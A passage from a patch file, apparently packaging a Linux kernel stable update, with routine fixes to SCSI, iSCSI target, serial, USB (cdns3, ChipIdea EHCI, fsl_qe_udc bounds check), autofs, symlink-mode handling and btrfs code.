+-	struct pci_dev *pdev;
+-
+-	pdev = pm8001_ha->pdev;
+-
+-#ifdef PM8001_USE_MSIX
+-	if (pci_find_capability(pdev, PCI_CAP_ID_MSIX))
+-		return pm8001_setup_msix(pm8001_ha);
+-	pm8001_dbg(pm8001_ha, INIT, "MSIX not supported!!!\n");
+-#endif
+-	return 0;
+-}
+-
+ /**
+  * pm8001_request_irq - register interrupt
+  * @pm8001_ha: our ha struct.
+  */
+ static u32 pm8001_request_irq(struct pm8001_hba_info *pm8001_ha)
+ {
+-	struct pci_dev *pdev;
++	struct pci_dev *pdev = pm8001_ha->pdev;
++#ifdef PM8001_USE_MSIX
+ 	int rc;
+ 
+-	pdev = pm8001_ha->pdev;
++	if (pci_find_capability(pdev, PCI_CAP_ID_MSIX)) {
++		rc = pm8001_setup_msix(pm8001_ha);
++		if (rc) {
++			pm8001_dbg(pm8001_ha, FAIL,
++				   "pm8001_setup_irq failed [ret: %d]\n", rc);
++			return rc;
++		}
+ 
+-#ifdef PM8001_USE_MSIX
+-	if (pdev->msix_cap && pci_msi_enabled())
+-		return pm8001_request_msix(pm8001_ha);
+-	else {
+-		pm8001_dbg(pm8001_ha, INIT, "MSIX not supported!!!\n");
+-		goto intx;
++		if (pdev->msix_cap && pci_msi_enabled())
++			return pm8001_request_msix(pm8001_ha);
+ 	}
++
++	pm8001_dbg(pm8001_ha, INIT, "MSIX not supported!!!\n");
+ #endif
+ 
+-intx:
+ 	/* initialize the INT-X interrupt */
+ 	pm8001_ha->irq_vector[0].irq_id = 0;
+ 	pm8001_ha->irq_vector[0].drv_inst = pm8001_ha;
+-	rc = request_irq(pdev->irq, pm8001_interrupt_handler_intx, IRQF_SHARED,
+-		pm8001_ha->name, SHOST_TO_SAS_HA(pm8001_ha->shost));
+-	return rc;
++
++	return request_irq(pdev->irq, pm8001_interrupt_handler_intx,
++			   IRQF_SHARED, pm8001_ha->name,
++			   SHOST_TO_SAS_HA(pm8001_ha->shost));
+ }
+ 
+ /**
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index f060e593685de..a7a364760b800 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -116,7 +116,7 @@ qla2x00_dfs_create_rport(scsi_qla_host_t *vha, struct fc_port *fp)
+ 
+ 	sprintf(wwn, "pn-%016llx", wwn_to_u64(fp->port_name));
+ 	fp->dfs_rport_dir = debugfs_create_dir(wwn, vha->dfs_rport_root);
+-	if (!fp->dfs_rport_dir)
++	if (IS_ERR(fp->dfs_rport_dir))
+ 		return;
+ 	if (NVME_TARGET(vha->hw, fp))
+ 		debugfs_create_file("dev_loss_tmo", 0600, fp->dfs_rport_dir,
+@@ -708,14 +708,14 @@ create_nodes:
+ 	if (IS_QLA27XX(ha) || IS_QLA83XX(ha) || IS_QLA28XX(ha)) {
+ 		ha->tgt.dfs_naqp = debugfs_create_file("naqp",
+ 		    0400, ha->dfs_dir, vha, &dfs_naqp_ops);
+-		if (!ha->tgt.dfs_naqp) {
++		if (IS_ERR(ha->tgt.dfs_naqp)) {
+ 			ql_log(ql_log_warn, vha, 0xd011,
+ 			       "Unable to create debugFS naqp node.\n");
+ 			goto out;
+ 		}
+ 	}
+ 	vha->dfs_rport_root = debugfs_create_dir("rports", ha->dfs_dir);
+-	if (!vha->dfs_rport_root) {
++	if (IS_ERR(vha->dfs_rport_root)) {
+ 		ql_log(ql_log_warn, vha, 0xd012,
+ 		       "Unable to create debugFS rports node.\n");
+ 		goto out;
+diff --git a/drivers/target/iscsi/iscsi_target_configfs.c b/drivers/target/iscsi/iscsi_target_configfs.c
+index 5d0f51822414e..c142a67dc7cc2 100644
+--- a/drivers/target/iscsi/iscsi_target_configfs.c
++++ b/drivers/target/iscsi/iscsi_target_configfs.c
+@@ -533,102 +533,102 @@ static ssize_t lio_target_nacl_info_show(struct config_item *item, char *page)
+ 	spin_lock_bh(&se_nacl->nacl_sess_lock);
+ 	se_sess = se_nacl->nacl_sess;
+ 	if (!se_sess) {
+-		rb += sprintf(page+rb, "No active iSCSI Session for Initiator"
++		rb += sysfs_emit_at(page, rb, "No active iSCSI Session for Initiator"
+ 			" Endpoint: %s\n", se_nacl->initiatorname);
+ 	} else {
+ 		sess = se_sess->fabric_sess_ptr;
+ 
+-		rb += sprintf(page+rb, "InitiatorName: %s\n",
++		rb += sysfs_emit_at(page, rb, "InitiatorName: %s\n",
+ 			sess->sess_ops->InitiatorName);
+-		rb += sprintf(page+rb, "InitiatorAlias: %s\n",
++		rb += sysfs_emit_at(page, rb, "InitiatorAlias: %s\n",
+ 			sess->sess_ops->InitiatorAlias);
+ 
+-		rb += sprintf(page+rb,
++		rb += sysfs_emit_at(page, rb,
+ 			      "LIO Session ID: %u   ISID: 0x%6ph  TSIH: %hu  ",
+ 			      sess->sid, sess->isid, sess->tsih);
+-		rb += sprintf(page+rb, "SessionType: %s\n",
++		rb += sysfs_emit_at(page, rb, "SessionType: %s\n",
+ 				(sess->sess_ops->SessionType) ?
+ 				"Discovery" : "Normal");
+-		rb += sprintf(page+rb, "Session State: ");
++		rb += sysfs_emit_at(page, rb, "Session State: ");
+ 		switch (sess->session_state) {
+ 		case TARG_SESS_STATE_FREE:
+-			rb += sprintf(page+rb, "TARG_SESS_FREE\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_FREE\n");
+ 			break;
+ 		case TARG_SESS_STATE_ACTIVE:
+-			rb += sprintf(page+rb, "TARG_SESS_STATE_ACTIVE\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_ACTIVE\n");
+ 			break;
+ 		case TARG_SESS_STATE_LOGGED_IN:
+-			rb += sprintf(page+rb, "TARG_SESS_STATE_LOGGED_IN\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_LOGGED_IN\n");
+ 			break;
+ 		case TARG_SESS_STATE_FAILED:
+-			rb += sprintf(page+rb, "TARG_SESS_STATE_FAILED\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_FAILED\n");
+ 			break;
+ 		case TARG_SESS_STATE_IN_CONTINUE:
+-			rb += sprintf(page+rb, "TARG_SESS_STATE_IN_CONTINUE\n");
++			rb += sysfs_emit_at(page, rb, "TARG_SESS_STATE_IN_CONTINUE\n");
+ 			break;
+ 		default:
+-			rb += sprintf(page+rb, "ERROR: Unknown Session"
++			rb += sysfs_emit_at(page, rb, "ERROR: Unknown Session"
+ 					" State!\n");
+ 			break;
+ 		}
+ 
+-		rb += sprintf(page+rb, "---------------------[iSCSI Session"
++		rb += sysfs_emit_at(page, rb, "---------------------[iSCSI Session"
+ 				" Values]-----------------------\n");
+-		rb += sprintf(page+rb, "  CmdSN/WR  :  CmdSN/WC  :  ExpCmdSN"
++		rb += sysfs_emit_at(page, rb, "  CmdSN/WR  :  CmdSN/WC  :  ExpCmdSN"
+ 				"  :  MaxCmdSN  :     ITT    :     TTT\n");
+ 		max_cmd_sn = (u32) atomic_read(&sess->max_cmd_sn);
+-		rb += sprintf(page+rb, " 0x%08x   0x%08x   0x%08x   0x%08x"
++		rb += sysfs_emit_at(page, rb, " 0x%08x   0x%08x   0x%08x   0x%08x"
+ 				"   0x%08x   0x%08x\n",
+ 			sess->cmdsn_window,
+ 			(max_cmd_sn - sess->exp_cmd_sn) + 1,
+ 			sess->exp_cmd_sn, max_cmd_sn,
+ 			sess->init_task_tag, sess->targ_xfer_tag);
+-		rb += sprintf(page+rb, "----------------------[iSCSI"
++		rb += sysfs_emit_at(page, rb, "----------------------[iSCSI"
+ 				" Connections]-------------------------\n");
+ 
+ 		spin_lock(&sess->conn_lock);
+ 		list_for_each_entry(conn, &sess->sess_conn_list, conn_list) {
+-			rb += sprintf(page+rb, "CID: %hu  Connection"
++			rb += sysfs_emit_at(page, rb, "CID: %hu  Connection"
+ 					" State: ", conn->cid);
+ 			switch (conn->conn_state) {
+ 			case TARG_CONN_STATE_FREE:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_FREE\n");
+ 				break;
+ 			case TARG_CONN_STATE_XPT_UP:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_XPT_UP\n");
+ 				break;
+ 			case TARG_CONN_STATE_IN_LOGIN:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_IN_LOGIN\n");
+ 				break;
+ 			case TARG_CONN_STATE_LOGGED_IN:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_LOGGED_IN\n");
+ 				break;
+ 			case TARG_CONN_STATE_IN_LOGOUT:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_IN_LOGOUT\n");
+ 				break;
+ 			case TARG_CONN_STATE_LOGOUT_REQUESTED:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_LOGOUT_REQUESTED\n");
+ 				break;
+ 			case TARG_CONN_STATE_CLEANUP_WAIT:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_CLEANUP_WAIT\n");
+ 				break;
+ 			default:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"ERROR: Unknown Connection State!\n");
+ 				break;
+ 			}
+ 
+-			rb += sprintf(page+rb, "   Address %pISc %s", &conn->login_sockaddr,
++			rb += sysfs_emit_at(page, rb, "   Address %pISc %s", &conn->login_sockaddr,
+ 				(conn->network_transport == ISCSI_TCP) ?
+ 				"TCP" : "SCTP");
+-			rb += sprintf(page+rb, "  StatSN: 0x%08x\n",
++			rb += sysfs_emit_at(page, rb, "  StatSN: 0x%08x\n",
+ 				conn->stat_sn);
+ 		}
+ 		spin_unlock(&sess->conn_lock);
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 687adc9e086ca..0686882bcbda3 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -264,6 +264,7 @@ void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt)
+ 		percpu_ref_put(&cmd_cnt->refcnt);
+ 
+ 	percpu_ref_exit(&cmd_cnt->refcnt);
++	kfree(cmd_cnt);
+ }
+ EXPORT_SYMBOL_GPL(target_free_cmd_counter);
+ 
+diff --git a/drivers/tty/serial/cpm_uart/cpm_uart_core.c b/drivers/tty/serial/cpm_uart/cpm_uart_core.c
+index b4369ed45ae2d..bb25691f50007 100644
+--- a/drivers/tty/serial/cpm_uart/cpm_uart_core.c
++++ b/drivers/tty/serial/cpm_uart/cpm_uart_core.c
+@@ -1257,19 +1257,14 @@ static void cpm_uart_console_write(struct console *co, const char *s,
+ {
+ 	struct uart_cpm_port *pinfo = &cpm_uart_ports[co->index];
+ 	unsigned long flags;
+-	int nolock = oops_in_progress;
+ 
+-	if (unlikely(nolock)) {
++	if (unlikely(oops_in_progress)) {
+ 		local_irq_save(flags);
+-	} else {
+-		spin_lock_irqsave(&pinfo->port.lock, flags);
+-	}
+-
+-	cpm_uart_early_write(pinfo, s, count, true);
+-
+-	if (unlikely(nolock)) {
++		cpm_uart_early_write(pinfo, s, count, true);
+ 		local_irq_restore(flags);
+ 	} else {
++		spin_lock_irqsave(&pinfo->port.lock, flags);
++		cpm_uart_early_write(pinfo, s, count, true);
+ 		spin_unlock_irqrestore(&pinfo->port.lock, flags);
+ 	}
+ }
+diff --git a/drivers/usb/cdns3/cdns3-plat.c b/drivers/usb/cdns3/cdns3-plat.c
+index 2bc5d094548b6..726b2e4f67e4d 100644
+--- a/drivers/usb/cdns3/cdns3-plat.c
++++ b/drivers/usb/cdns3/cdns3-plat.c
+@@ -256,9 +256,10 @@ static int cdns3_controller_resume(struct device *dev, pm_message_t msg)
+ 	cdns3_set_platform_suspend(cdns->dev, false, false);
+ 
+ 	spin_lock_irqsave(&cdns->lock, flags);
+-	cdns_resume(cdns, !PMSG_IS_AUTO(msg));
++	cdns_resume(cdns);
+ 	cdns->in_lpm = false;
+ 	spin_unlock_irqrestore(&cdns->lock, flags);
++	cdns_set_active(cdns, !PMSG_IS_AUTO(msg));
+ 	if (cdns->wakeup_pending) {
+ 		cdns->wakeup_pending = false;
+ 		enable_irq(cdns->wakeup_irq);
+diff --git a/drivers/usb/cdns3/cdnsp-pci.c b/drivers/usb/cdns3/cdnsp-pci.c
+index 29f433c5a6f3f..a85db23fa19f2 100644
+--- a/drivers/usb/cdns3/cdnsp-pci.c
++++ b/drivers/usb/cdns3/cdnsp-pci.c
+@@ -210,8 +210,9 @@ static int __maybe_unused cdnsp_pci_resume(struct device *dev)
+ 	int ret;
+ 
+ 	spin_lock_irqsave(&cdns->lock, flags);
+-	ret = cdns_resume(cdns, 1);
++	ret = cdns_resume(cdns);
+ 	spin_unlock_irqrestore(&cdns->lock, flags);
++	cdns_set_active(cdns, 1);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/usb/cdns3/core.c b/drivers/usb/cdns3/core.c
+index dbcdf3b24b477..7b20d2d5c262e 100644
+--- a/drivers/usb/cdns3/core.c
++++ b/drivers/usb/cdns3/core.c
+@@ -522,9 +522,8 @@ int cdns_suspend(struct cdns *cdns)
+ }
+ EXPORT_SYMBOL_GPL(cdns_suspend);
+ 
+-int cdns_resume(struct cdns *cdns, u8 set_active)
++int cdns_resume(struct cdns *cdns)
+ {
+-	struct device *dev = cdns->dev;
+ 	enum usb_role real_role;
+ 	bool role_changed = false;
+ 	int ret = 0;
+@@ -556,15 +555,23 @@ int cdns_resume(struct cdns *cdns, u8 set_active)
+ 	if (cdns->roles[cdns->role]->resume)
+ 		cdns->roles[cdns->role]->resume(cdns, cdns_power_is_lost(cdns));
+ 
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cdns_resume);
++
++void cdns_set_active(struct cdns *cdns, u8 set_active)
++{
++	struct device *dev = cdns->dev;
++
+ 	if (set_active) {
+ 		pm_runtime_disable(dev);
+ 		pm_runtime_set_active(dev);
+ 		pm_runtime_enable(dev);
+ 	}
+ 
+-	return 0;
++	return;
+ }
+-EXPORT_SYMBOL_GPL(cdns_resume);
++EXPORT_SYMBOL_GPL(cdns_set_active);
+ #endif /* CONFIG_PM_SLEEP */
+ 
+ MODULE_AUTHOR("Peter Chen <peter.chen@nxp.com>");
+diff --git a/drivers/usb/cdns3/core.h b/drivers/usb/cdns3/core.h
+index 2d332a788871e..4a4dbc2c15615 100644
+--- a/drivers/usb/cdns3/core.h
++++ b/drivers/usb/cdns3/core.h
+@@ -125,10 +125,13 @@ int cdns_init(struct cdns *cdns);
+ int cdns_remove(struct cdns *cdns);
+ 
+ #ifdef CONFIG_PM_SLEEP
+-int cdns_resume(struct cdns *cdns, u8 set_active);
++int cdns_resume(struct cdns *cdns);
+ int cdns_suspend(struct cdns *cdns);
++void cdns_set_active(struct cdns *cdns, u8 set_active);
+ #else /* CONFIG_PM_SLEEP */
+-static inline int cdns_resume(struct cdns *cdns, u8 set_active)
++static inline int cdns_resume(struct cdns *cdns)
++{ return 0; }
++static inline int cdns_set_active(struct cdns *cdns, u8 set_active)
+ { return 0; }
+ static inline int cdns_suspend(struct cdns *cdns)
+ { return 0; }
+diff --git a/drivers/usb/chipidea/ci.h b/drivers/usb/chipidea/ci.h
+index 85a803c135ab3..2ff83911219f8 100644
+--- a/drivers/usb/chipidea/ci.h
++++ b/drivers/usb/chipidea/ci.h
+@@ -253,6 +253,7 @@ struct ci_hdrc {
+ 	bool				id_event;
+ 	bool				b_sess_valid_event;
+ 	bool				imx28_write_fix;
++	bool				has_portsc_pec_bug;
+ 	bool				supports_runtime_pm;
+ 	bool				in_lpm;
+ 	bool				wakeup_int;
+diff --git a/drivers/usb/chipidea/ci_hdrc_imx.c b/drivers/usb/chipidea/ci_hdrc_imx.c
+index caa91117ba429..984087bbf3e2b 100644
+--- a/drivers/usb/chipidea/ci_hdrc_imx.c
++++ b/drivers/usb/chipidea/ci_hdrc_imx.c
+@@ -67,11 +67,13 @@ static const struct ci_hdrc_imx_platform_flag imx7d_usb_data = {
+ 
+ static const struct ci_hdrc_imx_platform_flag imx7ulp_usb_data = {
+ 	.flags = CI_HDRC_SUPPORTS_RUNTIME_PM |
++		CI_HDRC_HAS_PORTSC_PEC_MISSED |
+ 		CI_HDRC_PMQOS,
+ };
+ 
+ static const struct ci_hdrc_imx_platform_flag imx8ulp_usb_data = {
+-	.flags = CI_HDRC_SUPPORTS_RUNTIME_PM,
++	.flags = CI_HDRC_SUPPORTS_RUNTIME_PM |
++		CI_HDRC_HAS_PORTSC_PEC_MISSED,
+ };
+ 
+ static const struct of_device_id ci_hdrc_imx_dt_ids[] = {
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 71f172ecfaabc..b9227f41cf1c0 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -1038,6 +1038,8 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 		CI_HDRC_IMX28_WRITE_FIX);
+ 	ci->supports_runtime_pm = !!(ci->platdata->flags &
+ 		CI_HDRC_SUPPORTS_RUNTIME_PM);
++	ci->has_portsc_pec_bug = !!(ci->platdata->flags &
++		CI_HDRC_HAS_PORTSC_PEC_MISSED);
+ 	platform_set_drvdata(pdev, ci);
+ 
+ 	ret = hw_device_init(ci, base);
+diff --git a/drivers/usb/chipidea/host.c b/drivers/usb/chipidea/host.c
+index bc3634a54c6b7..3b08c5e811707 100644
+--- a/drivers/usb/chipidea/host.c
++++ b/drivers/usb/chipidea/host.c
+@@ -151,6 +151,7 @@ static int host_start(struct ci_hdrc *ci)
+ 	ehci->has_hostpc = ci->hw_bank.lpm;
+ 	ehci->has_tdi_phy_lpm = ci->hw_bank.lpm;
+ 	ehci->imx28_write_fix = ci->imx28_write_fix;
++	ehci->has_ci_pec_bug = ci->has_portsc_pec_bug;
+ 
+ 	priv = (struct ehci_ci_priv *)ehci->priv;
+ 	priv->reg_vbus = NULL;
+diff --git a/drivers/usb/gadget/udc/fsl_qe_udc.c b/drivers/usb/gadget/udc/fsl_qe_udc.c
+index 3b1cc8fa30c83..72b6d74b34982 100644
+--- a/drivers/usb/gadget/udc/fsl_qe_udc.c
++++ b/drivers/usb/gadget/udc/fsl_qe_udc.c
+@@ -1959,9 +1959,13 @@ static void ch9getstatus(struct qe_udc *udc, u8 request_type, u16 value,
+ 	} else if ((request_type & USB_RECIP_MASK) == USB_RECIP_ENDPOINT) {
+ 		/* Get endpoint status */
+ 		int pipe = index & USB_ENDPOINT_NUMBER_MASK;
+-		struct qe_ep *target_ep = &udc->eps[pipe];
++		struct qe_ep *target_ep;
+ 		u16 usep;
+ 
++		if (pipe >= USB_MAX_ENDPOINTS)
++			goto stall;
++		target_ep = &udc->eps[pipe];
++
+ 		/* stall if endpoint doesn't exist */
+ 		if (!target_ep->ep.desc)
+ 			goto stall;
+diff --git a/drivers/usb/host/ehci-hcd.c b/drivers/usb/host/ehci-hcd.c
+index a1930db0da1c3..802bfafb1012b 100644
+--- a/drivers/usb/host/ehci-hcd.c
++++ b/drivers/usb/host/ehci-hcd.c
+@@ -755,10 +755,14 @@ restart:
+ 
+ 	/* normal [4.15.1.2] or error [4.15.1.1] completion */
+ 	if (likely ((status & (STS_INT|STS_ERR)) != 0)) {
+-		if (likely ((status & STS_ERR) == 0))
++		if (likely ((status & STS_ERR) == 0)) {
+ 			INCR(ehci->stats.normal);
+-		else
++		} else {
++			/* Force to check port status */
++			if (ehci->has_ci_pec_bug)
++				status |= STS_PCD;
+ 			INCR(ehci->stats.error);
++		}
+ 		bh = 1;
+ 	}
+ 
+diff --git a/drivers/usb/host/ehci-hub.c b/drivers/usb/host/ehci-hub.c
+index efe30e3be22f7..1aee392e84927 100644
+--- a/drivers/usb/host/ehci-hub.c
++++ b/drivers/usb/host/ehci-hub.c
+@@ -674,7 +674,8 @@ ehci_hub_status_data (struct usb_hcd *hcd, char *buf)
+ 
+ 		if ((temp & mask) != 0 || test_bit(i, &ehci->port_c_suspend)
+ 				|| (ehci->reset_done[i] && time_after_eq(
+-					jiffies, ehci->reset_done[i]))) {
++					jiffies, ehci->reset_done[i]))
++				|| ehci_has_ci_pec_bug(ehci, temp)) {
+ 			if (i < 7)
+ 			    buf [0] |= 1 << (i + 1);
+ 			else
+@@ -875,6 +876,13 @@ int ehci_hub_control(
+ 		if (temp & PORT_PEC)
+ 			status |= USB_PORT_STAT_C_ENABLE << 16;
+ 
++		if (ehci_has_ci_pec_bug(ehci, temp)) {
++			status |= USB_PORT_STAT_C_ENABLE << 16;
++			ehci_info(ehci,
++				"PE is cleared by HW port:%d PORTSC:%08x\n",
++				wIndex + 1, temp);
++		}
++
+ 		if ((temp & PORT_OCC) && (!ignore_oc && !ehci->spurious_oc)){
+ 			status |= USB_PORT_STAT_C_OVERCURRENT << 16;
+ 
+diff --git a/drivers/usb/host/ehci.h b/drivers/usb/host/ehci.h
+index ad3f13a3eaf1b..5c0e25742e179 100644
+--- a/drivers/usb/host/ehci.h
++++ b/drivers/usb/host/ehci.h
+@@ -207,6 +207,7 @@ struct ehci_hcd {			/* one per controller */
+ 	unsigned		has_fsl_port_bug:1; /* FreeScale */
+ 	unsigned		has_fsl_hs_errata:1;	/* Freescale HS quirk */
+ 	unsigned		has_fsl_susp_errata:1;	/* NXP SUSP quirk */
++	unsigned		has_ci_pec_bug:1;	/* ChipIdea PEC bug */
+ 	unsigned		big_endian_mmio:1;
+ 	unsigned		big_endian_desc:1;
+ 	unsigned		big_endian_capbase:1;
+@@ -707,6 +708,15 @@ ehci_port_speed(struct ehci_hcd *ehci, unsigned int portsc)
+  */
+ #define ehci_has_fsl_susp_errata(e)	((e)->has_fsl_susp_errata)
+ 
++/*
++ * Some Freescale/NXP processors using ChipIdea IP have a bug in which
++ * disabling the port (PE is cleared) does not cause PEC to be asserted
++ * when frame babble is detected.
++ */
++#define ehci_has_ci_pec_bug(e, portsc) \
++	((e)->has_ci_pec_bug && ((e)->command & CMD_PSE) \
++	 && !(portsc & PORT_PEC) && !(portsc & PORT_PE))
++
+ /*
+  * While most USB host controllers implement their registers in
+  * little-endian format, a minority (celleb companion chip) implement
+diff --git a/fs/attr.c b/fs/attr.c
+index 9b9a70e0cc54f..3172f57f71f8d 100644
+--- a/fs/attr.c
++++ b/fs/attr.c
+@@ -394,9 +394,25 @@ int notify_change(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 		return error;
+ 
+ 	if ((ia_valid & ATTR_MODE)) {
+-		umode_t amode = attr->ia_mode;
++		/*
++		 * Don't allow changing the mode of symlinks:
++		 *
++		 * (1) The vfs doesn't take the mode of symlinks into account
++		 *     during permission checking.
++		 * (2) This has never worked correctly. Most major filesystems
++		 *     did return EOPNOTSUPP due to interactions with POSIX ACLs
++		 *     but did still update the mode of the symlink.
++		 *     This inconsistency led system call wrapper providers such
++		 *     as libc to block changing the mode of symlinks with
++		 *     EOPNOTSUPP already.
++		 * (3) To even do this in the first place one would have to use
++		 *     specific file descriptors and expend quite some effort.
++		 */
++		if (S_ISLNK(inode->i_mode))
++			return -EOPNOTSUPP;
++
+ 		/* Flag setting protected by i_mutex */
+-		if (is_sxid(amode))
++		if (is_sxid(attr->ia_mode))
+ 			inode->i_flags &= ~S_NOSEC;
+ 	}
+ 
+diff --git a/fs/autofs/waitq.c b/fs/autofs/waitq.c
+index 54c1f8b8b0757..efdc76732faed 100644
+--- a/fs/autofs/waitq.c
++++ b/fs/autofs/waitq.c
+@@ -32,8 +32,9 @@ void autofs_catatonic_mode(struct autofs_sb_info *sbi)
+ 		wq->status = -ENOENT; /* Magic is gone - report failure */
+ 		kfree(wq->name.name - wq->offset);
+ 		wq->name.name = NULL;
+-		wq->wait_ctr--;
+ 		wake_up_interruptible(&wq->queue);
++		if (!--wq->wait_ctr)
++			kfree(wq);
+ 		wq = nwq;
+ 	}
+ 	fput(sbi->pipe);	/* Close the pipe */
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index cac5169eaf8de..d2cbb7733c7d6 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -1148,20 +1148,33 @@ static int __btrfs_run_delayed_items(struct btrfs_trans_handle *trans, int nr)
+ 		ret = __btrfs_commit_inode_delayed_items(trans, path,
+ 							 curr_node);
+ 		if (ret) {
+-			btrfs_release_delayed_node(curr_node);
+-			curr_node = NULL;
+ 			btrfs_abort_transaction(trans, ret);
+ 			break;
+ 		}
+ 
+ 		prev_node = curr_node;
+ 		curr_node = btrfs_next_delayed_node(curr_node);
++		/*
++		 * See the comment below about releasing the path before releasing
++		 * the node. If the commit of delayed items was successful the path
++		 * should always be released, but in case of an error, it may
++		 * point to locked extent buffers (a leaf at the very least).
++		 */
++		ASSERT(path->nodes[0] == NULL);
+ 		btrfs_release_delayed_node(prev_node);
+ 	}
+ 
++	/*
++	 * Release the path to avoid a potential deadlock and lockdep splat when
++	 * releasing the delayed node, as that requires taking the delayed node's
++	 * mutex. If another task starts running delayed items before we take
++	 * the mutex, it will first lock the mutex and then it may try to lock
++	 * the same btree path (leaf).
++	 */
++	btrfs_free_path(path);
++
+ 	if (curr_node)
+ 		btrfs_release_delayed_node(curr_node);
+-	btrfs_free_path(path);
+ 	trans->block_rsv = block_rsv;
+ 
+ 	return ret;
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 64daae693afd1..d1dae29a3d012 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -859,6 +859,7 @@ static bool btree_dirty_folio(struct address_space *mapping,
+ 		struct folio *folio)
+ {
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(mapping->host->i_sb);
++	struct btrfs_subpage_info *spi = fs_info->subpage_info;
+ 	struct btrfs_subpage *subpage;
+ 	struct extent_buffer *eb;
+ 	int cur_bit = 0;
+@@ -872,18 +873,19 @@ static bool btree_dirty_folio(struct address_space *mapping,
+ 		btrfs_assert_tree_write_locked(eb);
+ 		return filemap_dirty_folio(mapping, folio);
+ 	}
++
++	ASSERT(spi);
+ 	subpage = folio_get_private(folio);
+ 
+-	ASSERT(subpage->dirty_bitmap);
+-	while (cur_bit < BTRFS_SUBPAGE_BITMAP_SIZE) {
++	for (cur_bit = spi->dirty_offset;
++	     cur_bit < spi->dirty_offset + spi->bitmap_nr_bits;
++	     cur_bit++) {
+ 		unsigned long flags;
+ 		u64 cur;
+-		u16 tmp = (1 << cur_bit);
+ 
+ 		spin_lock_irqsave(&subpage->lock, flags);
+-		if (!(tmp & subpage->dirty_bitmap)) {
++		if (!test_bit(cur_bit, subpage->bitmaps)) {
+ 			spin_unlock_irqrestore(&subpage->lock, flags);
+-			cur_bit++;
+ 			continue;
+ 		}
+ 		spin_unlock_irqrestore(&subpage->lock, flags);
+@@ -896,7 +898,7 @@ static bool btree_dirty_folio(struct address_space *mapping,
+ 		btrfs_assert_tree_write_locked(eb);
+ 		free_extent_buffer(eb);
+ 
+-		cur_bit += (fs_info->nodesize >> fs_info->sectorsize_bits);
++		cur_bit += (fs_info->nodesize >> fs_info->sectorsize_bits) - 1;
+ 	}
+ 	return filemap_dirty_folio(mapping, folio);
+ }
+@@ -2728,13 +2730,11 @@ int btrfs_validate_super(struct btrfs_fs_info *fs_info,
+ 		ret = -EINVAL;
+ 	}
+ 
+-	if (btrfs_fs_incompat(fs_info, METADATA_UUID) &&
+-	    memcmp(fs_info->fs_devices->metadata_uuid,
+-		   fs_info->super_copy->metadata_uuid, BTRFS_FSID_SIZE)) {
++	if (memcmp(fs_info->fs_devices->metadata_uuid, btrfs_sb_fsid_ptr(sb),
++		   BTRFS_FSID_SIZE) != 0) {
+ 		btrfs_err(fs_info,
+ "superblock metadata_uuid doesn't match metadata uuid of fs_devices: %pU != %pU",
+-			fs_info->super_copy->metadata_uuid,
+-			fs_info->fs_devices->metadata_uuid);
++			  btrfs_sb_fsid_ptr(sb), fs_info->fs_devices->metadata_uuid);
+ 		ret = -EINVAL;
+ 	}
+ 
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 0640ef59fe660..08ff10a81cb90 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -863,6 +863,11 @@ again:
+ 		err = -ENOENT;
+ 		goto out;
+ 	} else if (WARN_ON(ret)) {
++		btrfs_print_leaf(path->nodes[0]);
++		btrfs_err(fs_info,
++"extent item not found for insert, bytenr %llu num_bytes %llu parent %llu root_objectid %llu owner %llu offset %llu",
++			  bytenr, num_bytes, parent, root_objectid, owner,
++			  offset);
+ 		err = -EIO;
+ 		goto out;
+ 	}
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 9de647e48e7eb..2e29fafe0e7d9 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -2850,6 +2850,13 @@ static int btrfs_search_path_in_tree_user(struct user_namespace *mnt_userns,
+ 				goto out_put;
+ 			}
+ 
++			/*
++			 * We don't need the path anymore, so release it and
++			 * avoid deadlocks and lockdep warnings in case
++			 * btrfs_iget() needs to look up the inode from its root
++			 * btree and lock the same leaf.
++			 */
++			btrfs_release_path(path);
+ 			temp_inode = btrfs_iget(sb, key2.objectid, root);
+ 			if (IS_ERR(temp_inode)) {
+ 				ret = PTR_ERR(temp_inode);
